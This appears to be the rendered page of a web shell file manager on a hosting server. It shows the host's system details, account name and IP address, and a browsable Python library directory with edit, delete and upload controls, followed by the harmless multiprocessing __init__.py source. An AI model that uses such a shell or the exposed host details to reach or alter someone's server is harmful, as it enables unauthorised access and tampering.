[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
lib64
/
python3.6
/
multiprocessing
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 __pycache__
SET
[ DEL ]
📁 dummy
SET
[ DEL ]
📄 __init__.py
923 B
SET
[ EDIT ]
|
[ DEL ]
📄 connection.py
31,062 B
SET
[ EDIT ]
|
[ DEL ]
📄 context.py
10,917 B
SET
[ EDIT ]
|
[ DEL ]
📄 forkserver.py
8,694 B
SET
[ EDIT ]
|
[ DEL ]
📄 heap.py
8,319 B
SET
[ EDIT ]
|
[ DEL ]
📄 managers.py
38,151 B
SET
[ EDIT ]
|
[ DEL ]
📄 pool.py
26,059 B
SET
[ EDIT ]
|
[ DEL ]
📄 popen_fork.py
2,307 B
SET
[ EDIT ]
|
[ DEL ]
📄 popen_forkserver.py
1,956 B
SET
[ EDIT ]
|
[ DEL ]
📄 popen_spawn_posix.py
1,904 B
SET
[ EDIT ]
|
[ DEL ]
📄 popen_spawn_win32.py
2,999 B
SET
[ EDIT ]
|
[ DEL ]
📄 process.py
9,211 B
SET
[ EDIT ]
|
[ DEL ]
📄 queues.py
10,763 B
SET
[ EDIT ]
|
[ DEL ]
📄 reduction.py
9,226 B
SET
[ EDIT ]
|
[ DEL ]
📄 resource_sharer.py
5,325 B
SET
[ EDIT ]
|
[ DEL ]
📄 semaphore_tracker.py
5,394 B
SET
[ EDIT ]
|
[ DEL ]
📄 sharedctypes.py
6,245 B
SET
[ EDIT ]
|
[ DEL ]
📄 spawn.py
8,863 B
SET
[ EDIT ]
|
[ DEL ]
📄 synchronize.py
12,050 B
SET
[ EDIT ]
|
[ DEL ]
📄 util.py
11,886 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: __init__.py
# # Package analogous to 'threading.py' but using processes # # multiprocessing/__init__.py # # This package is intended to duplicate the functionality (and much of # the API) of threading.py but uses processes instead of threads. A # subpackage 'multiprocessing.dummy' has the same API but is a simple # wrapper for 'threading'. # # Copyright (c) 2006-2008, R Oudkerk # Licensed to PSF under a Contributor Agreement. # import sys from . import context # # Copy stuff from default context # globals().update((name, getattr(context._default_context, name)) for name in context._default_context.__all__) __all__ = context._default_context.__all__ # # XXX These should not really be documented or public. # SUBDEBUG = 5 SUBWARNING = 25 # # Alias for main module -- will be reset by bootstrapping child processes # if '__main__' in sys.modules: sys.modules['__mp_main__'] = sys.modules['__main__']